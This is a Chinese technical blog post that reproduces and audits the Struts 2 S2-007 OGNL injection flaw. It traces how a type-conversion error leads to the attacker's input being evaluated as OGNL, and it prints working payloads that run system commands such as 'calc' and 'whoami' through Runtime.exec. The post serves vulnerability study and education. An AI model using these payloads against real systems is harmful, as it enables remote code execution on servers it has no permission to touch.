『Java安全』Struts 2.2.3 表单参数类型转换错误OGNL注入漏洞S2-007复现与浅析

最新推荐文章于 2023-09-26 16:27:05 发布
最新推荐文章于 2023-09-26 16:27:05 发布
阅读量497 收藏
点赞数
分类专栏: # Struts 2 文章标签: java struts web安全 ognl s2-007
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/126505065
版权

文章目录

漏洞简介

对表单参数使用validator验证时,如果遇到类型错误,参数值会先压入参数栈,之后会取出并被二次ognl解析

影响范围

Struts 2.0.0 - 2.2.3

漏洞复现

环境配置

validation机制参考:

https://www.cnblogs.com/BrowserSnake/p/3745445.html

官网下载对应lib,需要这几个jar:

在这里插入图片描述
写一个最简单的action

在这里插入图片描述
再写一个表单提交到action

在这里插入图片描述
然后创建action,如果输入成功就会显示index内容,输入验证不过则会继续输入,验证未通过的result是input

在这里插入图片描述
然后在action的同目录下创建validation,名称是action类名-validation.xml,这里验证表单提交的参数id必须是int型,且范围是[1,10],如果验证不通过返回message的内容,跳转到result input标签所指定的页面,否则返回success

在这里插入图片描述

复现过程

以下是验证:

'+(111*222)+'

在这里插入图片描述
验证存在后,表单发送:

'+(#_memberAccess.allowStaticMethodAccess=true ,#context["xwork.MethodAccessor.denyMethodExecution"]=false,@java.lang.Runtime@getRuntime().exec('calc'))+'

在这里插入图片描述

代码审计

漏洞是由于参数类型转换错误为入口触发的,在xwork中有对于类型转换错误的拦截器ConversionErrorInterceptor
在这里插入图片描述
在其intercept方法加断点,首先POST的参数已经在参数栈了

在这里插入图片描述
取出错误的参数,放到空map,放入之前先进行了getOverrideExpr()

在这里插入图片描述
输入的参数用单引号包裹,因此payload有单引号是利用字符串拼接截断了,然后构建了正常ognl表达式

在这里插入图片描述
fakie这个map放到了context

在这里插入图片描述
处理完拦截器后之后,数据会填入前台页面,这里在渲染的时候,通过ComponentTagSupport.doEndTag()方法会解析参数,同S2-001

在这里插入图片描述
首先解析出变量名

在这里插入图片描述
然后解析变量值

在这里插入图片描述
获取值的类型是String,然后把参数名包裹成OGNL表达式,通过OGNL解析来获取值以供渲染用

在这里插入图片描述
ognl解析都是复用util的代码

在这里插入图片描述
来到tryFindValue,expr会变成参数值,然后调用getValue

在这里插入图片描述
最终调用Ognl.getValue()解析单引号截断的表达式,完成注入
在这里插入图片描述
由于类型转换错误以及自定义validator错误,全部都渲染到模板上了,开发者这一步是为了提供一个重新输入的功能,返回到result的name是input

在这里插入图片描述

流程

  • 用单引号和加号包裹payload,'+(xxx)+'
  • 开启allowStaticMethodAccess(可选)
  • 关闭denyMethodExecution

利用

由于S2自带了commons-io,方便了执行任意命令

'+(#_memberAccess.allowStaticMethodAccess=true ,#context["xwork.MethodAccessor.denyMethodExecution"]=false,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream()))+'

参考

https://cwiki.apache.org/confluence/display/WW/S2-007

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/126505065
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
专栏目录
s2-048)Struts2 反序列化漏洞
weixin_45253622的博客
12-14 1283
Struts2 Struts2是一个基于MVC设计模式(java)的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序。 漏洞复现
Confluence OGNL表达式注入漏洞复现与分析(CVE-2022-26134)
Brucetg的博客
06-06 4488
在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,该漏洞允许未经身份验证的攻击者在 Confluence Server 或 Data Center 实例上执行任意代码
S2-007漏洞复现
baidu_38844729的博客
11-14 305
漏洞原理 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。 影响版本:Struts2 2.0.0 - Struts2 2.2.3 漏洞利用 访问页面 http://local...
Struts S2-007复现
ZJT6666666的博客
12-21 422
Struts S2-007复现
vulhub-struts2-S2-007 远程代码执行漏洞复现
qq_56426046的博客
06-19 280
影响版本: 2.0.0 - 2.2.3。
漏洞复现----29、Struts2/S2-007
七天
06-29 1577
影响版本 2.0.0 - 2.2.3 漏洞原理 参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html 当配置了验证规则 -validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction: (…) public class UserAction extends Ac
给你汇报Struts2 S2-016漏洞修复的总结
HBohan的博客
06-27 1872
这篇文章主要介绍了Struts2 S2-016漏洞修复的总结,有需要的小伙伴可以进来参考下,来一起互相探讨一下哦 Struts2的S2-016漏洞是之前比较重大的漏洞,也是一些老系统的历史遗留问题 此漏洞影响struts2.0-struts2.3的所有版本,可直接导致服务器被远程控制从而引起数据泄漏,影响巨大 漏洞修复总结有4种方式: 1、升级版本 这也是Apache官方给出的建议,把Struts2的版本升级到2.3.15以上的版本,这种方式只需要替换一些jar包,归纳如下: commons-lang3
struts2安全漏洞-升级struts2 jar文件从2.2.3至2.3.16
08-07
- **CVE-2017-5638**:这是一个著名的漏洞,被称为“Struts Shatter”,由于OGNL(Object-Graph Navigation Language)表达式处理不当,允许攻击者通过HTTP请求头注入恶意代码,从而实现远程代码执行。 - **CVE-...
struts2.2.3升级struts2.3.34.rar
12-20
Struts2.2.3到Struts2.3.34的升级是一个重要的安全更新,因为新版本包含了针对已知漏洞的补丁。其中,最著名的可能就是CVE(Common Vulnerabilities and Exposures)编号的漏洞,例如CVE-2017-5638,这是一个远程...
struts2-2.3.32-all
03-08
描述中提到的"S2-045漏洞"是一个重要的安全问题,这个漏洞存在于Struts2的2.3.x版本中,具体来说是由于OGNL(Object-Graph Navigation Language)表达式处理不当导致的。OGNL是一种强大的表达式语言,用于在对象图中...
Apache Struts OGNL表达式注入漏洞
weixin_30693183的博客
06-07 1135
漏洞名称: Apache Struts OGNL表达式注入漏洞 CNNVD编号: CNNVD-201306-105 发布时间: 2013-06-07 更新时间: 2013-06-07 危害等级: 漏洞类型: 威胁类型: 远程 CVE编号: CVE-2013-2135 ...
Struts2 漏洞复现s2-007
weixin_51220765的博客
12-14 1138
Struts2 漏洞复现s2-007 原理: age来自于用户输入,传递一个非整数给id导致错误struts会将用户的输入当作ongl表达式执行,从而导致了漏洞 1.到007下 cd vulhub-master/struts2/s2-007 2.启动007 docker-compose up -d 3.访问靶机ip:8080 注意:如果此时报404错误,不要慌哦~ 我们去浏览器的历史记录里清除一下缓存,然后刷新一下页面就好了!具体步骤如下: 当页面回复正常后,我们就可以继续进行咯~ 3
Maven Struts2
十年彩虹
09-10 643
org.apache.struts struts2-core ${struts.version} org.apache.struts struts2-json-plugin ${struts.version} org.apache.struts struts2-spring-plugin ${struts.version}
CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现
最新发布
m0_72717546的博客
09-26 339
Confluence是一个专业的知识库协同工具,它可以进行企业知识管理与软件协同,是一个利于构建企业WIKI的Web应用。Confluence使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。是企业中强大的信息读取、存放的共享平台。在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码
s2-007远程代码执行漏洞
Stephen Wolf
11-15 2124
一、漏洞简述: age来自于用户输入,传递一个非整数给id导致错误struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。 影响版本: 2.0.0 - 2.2.3 二、环境搭建 vulhub里搭建环境(我发表过好多关于struts2漏洞的环境搭建,这些具体步骤都类似,详情前参考s2-045) 三、漏洞复现 访问ip+80...
Java安全Struts2 2.0.8 OGNL注入漏洞S2-001复现浅析
Ho1aAs‘s Blog
07-29 1010
学习一下S2漏洞的利用Struts2使用opensymphony.xwork2.0.3组件解析OGNL,该组件导致OGNL注入漏洞,发送表单时内容会引发OGNL注入
Java安全Struts 2.3.14.2 action占位符OGNL注入漏洞S2-015复现浅析
Ho1aAs‘s Blog
08-29 994
action的name可以设置为*,当URL没有匹配到任何action的时候,就会匹配*对应的action;而一般开发中获取*对应的字符串,然后result返回以该字符串命名的jsp,获取该字符串用的是占位符{x},依照星号从左往右从1开始匹配例如:......
s2系列——s2-007,s2-008,s2-009复现
qq_54030686的博客
03-02 4889
s2-007,s2-008,s2-009复现 简而言之就是payload的输入,具体复现这里不再复现,相关博文,也有蛮多,这里更新下脚本 s2-007 def s2007(url): try: proxy = '192.168.43.74:8080' # 本地代理 proxies = { 'http': 'http://' + proxy, 'https': 'https://' + proxy }
Struts2-007:远程代码执行漏洞深度剖析与修复策略
Struts2-007漏洞Apache Struts2框架的一个严重安全问题,涉及到远程代码执行的风险。该漏洞存在于Struts2 2.0.0至2.2.3版本之间,主要由于框架允许HTTP请求数据被注入到业务Action的属性中,而Struts2默认的类型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值